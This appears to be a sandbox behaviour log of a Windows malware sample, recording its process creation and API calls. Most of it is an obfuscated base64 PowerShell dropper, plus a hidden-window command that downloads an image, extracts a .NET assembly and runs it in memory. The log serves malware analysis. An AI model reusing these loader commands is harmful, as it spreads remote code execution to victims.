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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('hpYIrIKGX','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000300
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -command "$Codigo = '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KGXkhpYIrIKGXHMhpYIrIKGXdhpYIrIKGXBhhpYIrIKGXHIhpYIrIKGXdhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGchpYIrIKGXZQhpYIrIKGXghpYIrIKGXDhpYIrIKGXhpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGEhpYIrIKGXbgBkhpYIrIKGXChpYIrIKGXhpYIrIKGXJhpYIrIKGXBlhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGchpYIrIKGXdhpYIrIKGXhpYIrIKGXghpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEkhpYIrIKGXbgBkhpYIrIKGXGUhpYIrIKGXehpYIrIKGXhpYIrIKGX7hpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEkhpYIrIKGXbgBkhpYIrIKGXGUhpYIrIKGXehpYIrIKGXhpYIrIKGXghpYIrIKGXCshpYIrIKGXPQhpYIrIKGXghpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEYhpYIrIKGXbhpYIrIKGXBhhpYIrIKGXGchpYIrIKGXLgBMhpYIrIKGXGUhpYIrIKGXbgBnhpYIrIKGXHQhpYIrIKGXahpYIrIKGXhpYIrIKGX7hpYIrIKGXCQhpYIrIKGXYgBhhpYIrIKGXHMhpYIrIKGXZQhpYIrIKGX2hpYIrIKGXDQhpYIrIKGXThpYIrIKGXBlhpYIrIKGXG4hpYIrIKGXZwB0hpYIrIKGXGghpYIrIKGXIhpYIrIKGXhpYIrIKGX9hpYIrIKGXChpYIrIKGXhpYIrIKGXJhpYIrIKGXBlhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXChpYIrIKGXhpYIrIKGXJhpYIrIKGXBzhpYIrIKGXHQh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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('hpYIrIKGX','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath: powershell
1 1 0

CreateProcessInternalW

 thread_identifier: 2276
thread_handle: 0x0000044c
process_identifier: 2272
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LnNrbmlMeXR0dVAvZWxpZi8yMTIuMzExLjU3MS43MDEvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000450
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received [
Data received WeBû)yÕ¡4lœ³šÿ<v¥zÊe1—ó RDOWNGRD 3òNù¯¹dxï¼ â6þÓÃïóHÓ,þ'i|ÛÀÿ 
Data received }
Data received K
